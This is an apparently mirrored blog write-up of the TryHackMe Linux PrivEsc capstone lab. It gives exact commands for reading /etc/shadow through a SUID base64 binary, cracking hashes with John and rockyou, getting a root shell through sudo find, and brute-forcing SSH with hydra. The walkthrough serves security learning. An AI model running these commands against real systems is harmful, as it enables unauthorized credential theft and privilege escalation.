THM LinuxPrivEsc - 12 Capstone Challenge
source link: https://sebport0.github.io/thm-linuxprivesc-12capstonechallenge/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Recently I was inducted by a friend of mine(thanks Ori) to a new world. That world is the TryHackMe platform and, oh, what an addictive piece of hacking gaming madness wonder it is.
In this piece of text I would like to talk(or write?) about the Capstone Challenge from the Linux PrivEsc room.
Capstone Challenge
Mission: read the contents of flag1.txt and flag2.txt.
To start, let’s search for the flags with our current user. Maybe luck is on our side.
find / -name flag1.txt 2>/dev/null
Nothing.
find / -name flag2.txt 2>/dev/null
Nothing. As expected. We need access to a more priviliged user. Let’s try our luck with
/etc/passwd to see if some user looks promising.
cat /etc/passwd | cut -d ":" -f 1
We got
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
operator
games
ftp
nobody
pegasus
systemd-network
dbus
polkitd
colord
unbound
libstoragemgmt
saslauth
rpc
gluster
abrt
postfix
setroubleshoot
rtkit
pulse
radvd
chrony
saned
apache
qemu
ntp
tss
sssd
usbmuxd
geoclue
gdm
rpcuser
nfsnobody
gnome-initial-setup
pcp
sshd
avahi
oprofile
tcpdump
leonard
mailnull
smmsp
nscd
missy
From the list above, missy looks promising. In fact, we can see that there is a dir with her
name under /home
$ ls /home -l
total 4
drwx------. 7 leonard leonard 197 jun 7 2021 leonard
drwx------. 16 missy missy 4096 jun 7 2021 missy
drwx------. 2 root root 23 jun 7 2021 rootflag
A closer look at /etc/passwd shows us that
$cat /etc/passwd
missy:x:1001:1001::/home/missy:/bin/bash
This entry tells us:
- Username: missy.
- Password: x indicates that the password hash is stored inside /etc/shadow.
- Userid: 1001.
- Groupid: 1001.
- Userid info: none.
- Home dir: /home/missy.
- Login shell: /bin/bash.
Ok, the x tells us that we need to look inside /etc/shadow but this time cat /etc/shadow doesn’t
help us
$ cat /etc/shadow
cat: /etc/shadow: Permission denied
But maybe, just maybe ;), we can leverage some SUID or SGID exploit. Let’s search
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/base64
/usr/bin/ksu
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/Xorg
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/kde4/kpac_dhcp_helper
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper
/usr/libexec/qemu-bridge-helper
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/proxy_child
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/flatpak-bwrap
Nice! base64 is available. As we can see from GTFOBins we can read files with base64, even when being a user with less privileges.
$ base64 /etc/shadow | base64 --decode
root:$6$DWBzMoip..too long...nYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
bin:*:18353:0:99999:7:::
..snip..
nscd:!!:18785::::::
missy:$6$BjOlWE21...too long...KHb/:18785:0:99999:7:::
Now we can try to crack the password with John! On our local machine we create two files: passwd.txt and shadow.txt that are a copy-paste of /etc/passwd and /etc/shadow, respectively. Then, we unshadow them to a new file
$unshadow passwd.txt shadow.txt > passwords.txt
Now we run John with the rockyou.txt wordlist and cross our fingers
$john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
But this takes a loooot of time. A better way to find missy’s password is by doing
$echo "$6...too long but this is the missy password from /etc/shadow...I3rPVqKHb/" > missy_passw.txt
$john missy_passw.txt --show
?:Password1
1 password hash cracked, 0 left
Thank you John. Let’s login as missy
$su missy
Password:
$ whoami
missy
$ id
uid=1001(missy) gid=1001(missy) groups=1001(missy) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Let’s see what we can do
$ sudo -l
Matching Defaults entries for missy on ip-10-10-72-255:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User missy may run the following commands on ip-10-10-72-255:
(ALL) NOPASSWD: /usr/bin/find
Cool, we can use find! Let’s go for flag1
$ find / -name flag1.txt 2>/dev/null
/home/missy/Documents/flag1.txt
$ cat /home/missy/Documents/flag1.txt
THM-********
Just one more flag to go.
$ find / -name flag2.txt 2>/dev/null
Nothing :(
What can we do? Running find as sudo may give us better results
$ sudo find / -name flag2.txt 2>/dev/null
/home/rootflag/flag2.txt
Of course, we can’t read flag2.txt since is in /home/rootflag. What do we do now? If we take a look at GTFOBins find entry, we see that we can use find to launch a root shell. Magic! Let’s try it!
$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
We are root now! Let’s get the remaining flag
$ cat /home/rootflag/flag2.txt
THM-************8
Done!! >:)
Extras
Reading the flags as leonard
Could we use the base64 abuse to read the flags as leonard? Yep, totally, but we should be lucky in our guess of the flags locations
$ base64 /home/missy/Documents/flag1.txt | base64 --decode
THM-*********
$ base64 /home/rootflag/flag2.txt | base64 --decode
THM-***********
Looking for a linux kernel vulnerability to exploit
We can read /proc/version to get some information about the kernel
$ cat /proc/version
Linux version 3.10.0-1160.el7.x86_64 ([email protected]) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Mon Oct 19 16:18:59 UT
C 2020
So, the linux kernel version is 3.10.0-1160.el7… You get it. A quick search in exploit-db did not give something promising to try.
Adding a new user to /etc/passwd
We can generate a new password for our totally-invented user with openssl. The problem
is that, as leonard, we can’t edit /etc/passwd.
Crontabs
A look at the crontabs doesn’t show anything.
$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be execute
Hydra
Maybe running hydra alongside the rockyou wordlist could take us somewhere but it is very slow.
$hydra -l missy -P baul/rockyou.txt ssh://$TARGET
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK